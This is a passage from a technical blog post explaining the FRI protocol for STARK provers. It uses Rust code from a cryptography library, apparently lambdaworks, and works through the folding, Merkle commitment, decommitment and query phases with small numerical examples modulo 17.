&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let odd_coef_mul_beta: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt; = coef&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .skip(1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .step_by(2)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|v| (v.clone()) * beta)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (even_poly, odd_poly) = Polynomial::pad_with_zero_coefficients(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;Polynomial::new(&amp;amp;even_coef),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;Polynomial::new(&amp;amp;odd_coef_mul_beta),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    even_poly + odd_poly&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The variable &lt;code&gt;poly&lt;&#x2F;code&gt; contains the coefficients of the polynomial as a vector of field elements. We collect the even-degree coefficients with &lt;code&gt;iter().step_by(2)&lt;&#x2F;code&gt;, and take the odd-degree coefficients with &lt;code&gt;skip(1).step_by(2)&lt;&#x2F;code&gt;, multiplying each by $\beta$ (we could make this more efficient by zipping the two iterators, which avoids collecting the results and then iterating again over the arrays to add the values).&lt;&#x2F;p&gt;
&lt;p&gt;The problem is that we need to ensure that the polynomials cannot be changed to generate random values. One way to bind ourselves to a polynomial is to build a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Merkle_tree&quot;&gt;Merkle tree&lt;&#x2F;a&gt; from the evaluations of the polynomial over a suitable domain (this is the part where Reed-Solomon codes come into play). We take a domain $D_0 = \{ \omega, \omega g, \omega g^2 , … , \omega g^{\alpha N - 1} \}$, where $g$ is a generator of the group of $\alpha N$-th roots of unity and $\omega$ is an element outside that group. This way, we are forced to provide only values in the tree; the security of this scheme depends on the collision resistance of the hash function used to build the tree. For every folding step, we will have to make a layer containing the evaluations of the polynomial and its corresponding Merkle tree. An advantage of using $D_0$ as a domain is that when we consider the domain $D_1$ for $y = x^2$, its size is exactly half the size of $D_0$. Therefore, the tree for $p_1 (y)$ will be smaller than the one corresponding to $p_0 (x)$ (this is a property of the $n$-th roots of unity when $n$ is a power of 2: if $x_0$ is in the set, so is $- x_0$, and since $x_0^2 = (- x_0)^2$, the squares take only $n&#x2F;2$ different values).&lt;&#x2F;p&gt;
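&lt;p&gt;We can sanity-check this domain-halving property on a toy scale (all values here are made up for illustration): working modulo 17, the element 2 generates the 8th roots of unity, and squaring that set leaves only 4 distinct values.&lt;&#x2F;p&gt;

```rust
// Squaring the 8 roots of unity mod 17 yields only 4 distinct values,
// which is why the evaluation domain halves at each folding step.
fn main() {
    let p = 17u64;
    let mut d0 = vec![]; // D0: powers of 2, an element of order 8 mod 17
    let mut x = 1u64;
    for _ in 0..8 {
        d0.push(x);
        x = x * 2 % p;
    }
    let mut d1 = vec![];
    for v in d0.iter() {
        d1.push(v * v % p); // D1 = { x^2 : x in D0 }
    }
    d1.sort();
    d1.dedup();
    assert_eq!(d0.len(), 8);
    assert_eq!(d1.len(), 4); // |D1| is half of |D0|
}
```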
&lt;p&gt;FRI is also useful for creating a commitment scheme for polynomials using Merkle trees. If we want to show someone that we have a low degree polynomial $p(x)$ such that $p(z) = v$, we can evaluate the following quotient,&lt;br &#x2F;&gt;
$$q (x) = \frac{p(x) - v}{ x - z}$$&lt;br &#x2F;&gt;
and apply the FRI protocol to that quotient to show that it is indeed a low-degree polynomial.&lt;&#x2F;p&gt;
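&lt;p&gt;As a small sketch of this opening trick (toy integer values, not the prover’s actual field): if $p(x) = 1 + 2x + 3x^2$ and we claim $p(2) = 17$, then dividing $p(x) - 17$ by $x - 2$ must leave no remainder, and the quotient $q(x)$ has lower degree.&lt;&#x2F;p&gt;

```rust
// Quotient q(x) = (p(x) - v) divided by (x - z), computed by synthetic division,
// with toy values p(x) = 1 + 2x + 3x^2, z = 2, v = p(2) = 17.
fn main() {
    let p = [1i64, 2, 3]; // coefficients, lowest degree first
    let z = 2i64;
    let v = p[0] + p[1] * z + p[2] * z * z; // p(z) = 17
    // divide p(x) - v by (x - z), from the top coefficient down
    let q1 = p[2];                 // x coefficient of q
    let q0 = p[1] + z * q1;        // constant coefficient of q
    let rem = (p[0] - v) + z * q0; // remainder; zero exactly when p(z) = v
    assert_eq!([q0, q1], [8, 3]);  // q(x) = 8 + 3x, a lower-degree polynomial
    assert_eq!(rem, 0);
}
```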
&lt;h2 id=&quot;creating-fri-layers&quot;&gt;Creating FRI layers&lt;&#x2F;h2&gt;
&lt;p&gt;As mentioned before, we need to commit ourselves to our polynomial, and we will do that by creating a Merkle tree with the evaluations over a suitable domain. Below we provide a basic structure for a FriLayer: a vector of evaluations and a Merkle tree (we add the coset offset, $\omega$, and domain size just for convenience).&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[derive(Clone)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct FriLayer&amp;lt;F&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: IsField,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub evaluation: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub merkle_tree: FriMerkleTree&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub coset_offset: FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub domain_size: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl&amp;lt;F&amp;gt; FriLayer&amp;lt;F&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: IsField + IsFFTField,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub fn new(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        poly: &amp;amp;Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        coset_offset: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain_size: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ) -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let evaluation = poly&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .evaluate_offset_fft(1, Some(domain_size), coset_offset)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .unwrap(); &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let merkle_tree = FriMerkleTree::build(&amp;amp;evaluation);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            evaluation,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            merkle_tree,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            coset_offset: coset_offset.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            domain_size,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We also provide a method to create layers, given a polynomial, the domain size, and the domain offset. This will be combined later with the folding function to create new polynomials and obtain the different layers.&lt;&#x2F;p&gt;
&lt;p&gt;Given the polynomial, we can evaluate it efficiently using the FFT (due to the particular structure of the domain we are using) and obtain a vector of field elements; we then build the Merkle tree from the vector of evaluations with &lt;code&gt;FriMerkleTree::build&lt;&#x2F;code&gt; (if you want to learn more about how the Merkle tree works behind the scenes, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;crypto&#x2F;src&#x2F;merkle_tree&quot;&gt;here&lt;&#x2F;a&gt;). In the next section, we will show how to build and commit to all the FRI layers. After this stage, we can prove we committed to a low-degree polynomial.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;fri-commitment-phase&quot;&gt;FRI commitment phase&lt;&#x2F;h2&gt;
&lt;p&gt;Now that we can fold polynomials and build layers, we can commit to every layer and get the first part of the FRI protocol. The commit phase will give us a vector of layers and the final value of the FRI protocol (when we get to a degree-zero polynomial). The function receives the number of layers (which can be obtained from the degree of the polynomial), the polynomial in coefficient form, the transcript of the protocol (we append the roots of the Merkle trees here and use them to generate the random challenges via the Fiat-Shamir transformation), and the offset and domain size (we could give the domain $D_0$ instead of these last two). The domain size determines the size of the group of roots of unity, and the offset allows us to shift that group.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn fri_commit_phase&amp;lt;F: IsField + IsFFTField, T: Transcript&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    number_layers: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    p_0: Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript: &amp;amp;mut T,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    coset_offset: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain_size: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; (FieldElement&amp;lt;F&amp;gt;, Vec&amp;lt;FriLayer&amp;lt;F&amp;gt;&amp;gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut domain_size = domain_size;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut fri_layer_list = Vec::with_capacity(number_layers);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut current_layer = FriLayer::new(&amp;amp;p_0, coset_offset, domain_size);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fri_layer_list.push(current_layer.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut current_poly = p_0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; &amp;gt;&amp;gt;&amp;gt;&amp;gt; Send commitment: [p₀]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;current_layer.merkle_tree.root);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut coset_offset = coset_offset.clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for _ in 1..number_layers {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; &amp;lt;&amp;lt;&amp;lt;&amp;lt; Receive challenge 𝜁ₖ₋₁&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let zeta = transcript_to_field(transcript);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        coset_offset = coset_offset.square();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain_size &#x2F;= 2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; Compute layer polynomial and domain&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        current_poly = fold_polynomial(&amp;amp;current_poly, &amp;amp;zeta);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        current_layer = FriLayer::new(&amp;amp;current_poly, &amp;amp;coset_offset, domain_size);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let new_data = &amp;amp;current_layer.merkle_tree.root;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        fri_layer_list.push(current_layer.clone()); &#x2F;&#x2F; TODO: remove this clone&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; &amp;gt;&amp;gt;&amp;gt;&amp;gt; Send commitment: [pₖ]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        transcript.append(new_data);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; &amp;lt;&amp;lt;&amp;lt;&amp;lt; Receive challenge: 𝜁ₙ₋₁&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let zeta = transcript_to_field(transcript);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let last_poly = fold_polynomial(&amp;amp;current_poly, &amp;amp;zeta);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let last_value = last_poly&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .coefficients()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .get(0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .unwrap_or(&amp;amp;FieldElement::zero())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; &amp;gt;&amp;gt;&amp;gt;&amp;gt; Send value: pₙ&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;last_value.to_bytes_be());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (last_value, fri_layer_list)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We start by creating the layer for the first polynomial (which, in the context of a STARK prover, is the DEEP composition polynomial). Then, we commit to the polynomial’s evaluations by appending the root of its Merkle tree to the transcript.&lt;&#x2F;p&gt;
&lt;p&gt;Afterward, we continue with the recursive part of FRI: we sample the random coefficient ($\zeta$ in the code), square the offset and halve the domain size (so that we can generate the next evaluation domain), and fold the polynomial. We obtain the new layer, append its Merkle root to the transcript (so that we commit to the evaluations of the new polynomial), and push the new layer onto the vector of FriLayers. After we have gone through the recursive part, we fold one last time to arrive at the degree-zero polynomial and get the final value, which we also append to the transcript.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;fri-decommitment&quot;&gt;FRI decommitment&lt;&#x2F;h2&gt;
&lt;p&gt;Now that we have created all the commitments, we need to generate the proof so that a verifier can check that everything was done correctly. The only things we can pass to the verifier are values we committed to in the Merkle trees. Any evaluation in a layer’s tree can be calculated from two evaluations in the previous layer’s tree. We can see that:&lt;br &#x2F;&gt;
$$p_{0,e} (x) = \frac{p_0 (x) + p_0( - x )}{2}$$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$$p_{0,o} (x) = \frac{p_0 (x) - p_0( - x )}{2x}$$&lt;br &#x2F;&gt;
Luckily, if $p_0 (x_0)$ is in the Merkle tree, so is $p_0 (- x_0 )$, because of how we chose the domain $D_0$. We can see then that&lt;br &#x2F;&gt;
$$p_1 ( x_0^2 ) = \frac{p_0 ( x_0 ) + p_0( - x_0 )}{2} + \beta_0 \frac{(p_0 ( x_0 ) - p_0( - x_0 ))}{2x_0}$$&lt;br &#x2F;&gt;
Similarly,&lt;br &#x2F;&gt;
$$p_k ( w_0^2 ) = \frac{p_{k - 1} ( w_0 ) + p_{ k - 1}( - w_0 )}{2} + \beta_{k - 1} \frac{(p_{ k - 1 } ( w_0 ) - p_{ k - 1}( - w_0 ))}{2w_0}$$&lt;br &#x2F;&gt;
Therefore, we can check a value in a tree if we pass two values from the tree from the previous layer (these have to be the correct pair, which, owing to the structure of the evaluation domain, are always separated by half the length of the size of the tree).&lt;&#x2F;p&gt;
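&lt;p&gt;We can check this layer-consistency relation numerically on a toy scale (all values here are hypothetical: the integers modulo 17, $p_0 (x) = 1 + 2x + 3x^2 + 4x^3$, and $\beta_0 = 5$, so that $p_1 (y) = 11 + 23y$):&lt;&#x2F;p&gt;

```rust
// Toy check over the integers mod 17 of the decommitment relation
// p1(x0^2) = (p0(x0) + p0(-x0)) * inv(2) + beta * (p0(x0) - p0(-x0)) * inv(2*x0).
const P: u64 = 17;

fn pow_mod(b: u64, e: u64) -> u64 {
    let mut r = 1;
    for _ in 0..e {
        r = r * b % P;
    }
    r
}

// multiplicative inverse via Fermat's little theorem: x^(P-2) mod P
fn inv(x: u64) -> u64 {
    pow_mod(x, P - 2)
}

fn p0(x: u64) -> u64 {
    (1 + 2 * x + 3 * x * x + 4 * x * x * x) % P
}

// folded polynomial for beta = 5: p1(y) = (1 + 5*2) + (3 + 5*4) y = 11 + 23 y
fn p1(y: u64) -> u64 {
    (11 + 23 * y) % P
}

fn main() {
    let (x0, beta) = (2u64, 5u64);
    let x0_neg = P - x0; // -x0 in the field
    let even = (p0(x0) + p0(x0_neg)) % P * inv(2) % P;
    let odd = (p0(x0) + P - p0(x0_neg)) % P * inv(2 * x0 % P) % P;
    assert_eq!((even + beta * odd) % P, p1(x0 * x0 % P)); // layers are consistent
}
```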
&lt;p&gt;We will let the verifier choose an index in the Merkle tree of $p_0 (x)$. We will provide the verifier with the values of $p_0 (x_0)$ (where $x_0$ is the point in the domain corresponding to the index chosen by the verifier) and $p_0 (-x_0)$, then $p_1 ( x_0^2 )$, $p_1 ( - (x_0^2 ))$, $p_2 ( x_0^4 )$, $p_2 ( - (x_0^4 ))$, and so on until the last layer, $p_{ n - 1 } ( x_0^{ 2^{ n - 1 }} )$ and $p_{ n - 1} ( - (x_0^{ 2^{ n - 1 }} ))$, where $n$ is the number of foldings. This way, the verifier can go from the first polynomial to the final value and check that we did everything correctly. We must also show that the values we passed belong to their corresponding Merkle trees. We do this by providing an inclusion proof, given by the authentication path for each value. If the inclusion proofs and the calculations between the layers pass, the verifier will be convinced that we did things correctly for one point. However, passing the test for one point does not mean that the function is indeed a polynomial, because FRI is statistical in nature. Of course, the verifier can choose more points, and if the test passes for all of them, the verifier will be convinced with high probability that the function is indeed a polynomial. We call each point the verifier chooses a query (the higher the number of queries, the more likely a cheating prover is caught).&lt;&#x2F;p&gt;
&lt;p&gt;To handle each query better, we will have a FriDecommitment structure containing all the evaluation pairs (&lt;code&gt;layers_evaluations&lt;&#x2F;code&gt; and &lt;code&gt;layers_evaluations_sym&lt;&#x2F;code&gt;) and authentication paths for each (&lt;code&gt;layers_auth_paths&lt;&#x2F;code&gt; and &lt;code&gt;layers_auth_paths_sym&lt;&#x2F;code&gt;).&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct FriDecommitment&amp;lt;F: IsPrimeField&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub layers_auth_paths_sym: Vec&amp;lt;Proof&amp;lt;Commitment&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub layers_evaluations_sym: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub layers_auth_paths: Vec&amp;lt;Proof&amp;lt;Commitment&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub layers_evaluations: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We can now move on to the query phase of the protocol and obtain the proof for the FRI protocol. Since we want the protocol to be non-interactive, we need the transcript (to simulate the verifier via the Fiat-Shamir transformation), all the information from the FriLayers, and other parameters, such as the number of queries (contained here inside the AIR).&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn fri_query_phase&amp;lt;F, A, T&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    air: &amp;amp;A,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain_size: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fri_layers: &amp;amp;Vec&amp;lt;FriLayer&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript: &amp;amp;mut T,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
